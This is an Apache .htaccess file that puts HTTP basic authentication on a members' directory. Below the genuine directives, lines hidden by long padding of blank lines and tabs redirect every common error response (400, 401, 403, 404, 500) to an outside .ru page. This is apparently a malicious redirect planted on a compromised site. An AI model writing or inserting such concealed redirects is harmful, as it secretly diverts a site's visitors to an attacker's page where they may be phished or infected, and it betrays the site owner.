AuthName "Membres CA"
AuthUserFile "/home/lessent/.htpasswds/public_html/membreca/passwd"
AuthType Basic
require valid-user




















































																																																												
																														ErrorDocument 400 http://congatarcxisi.ru/mays/index.php																														
																														ErrorDocument 401 http://congatarcxisi.ru/mays/index.php																														
																														ErrorDocument 403 http://congatarcxisi.ru/mays/index.php																														
																														ErrorDocument 404 http://congatarcxisi.ru/mays/index.php																														
																														ErrorDocument 500 http://congatarcxisi.ru/mays/index.php																														
																																																												


















































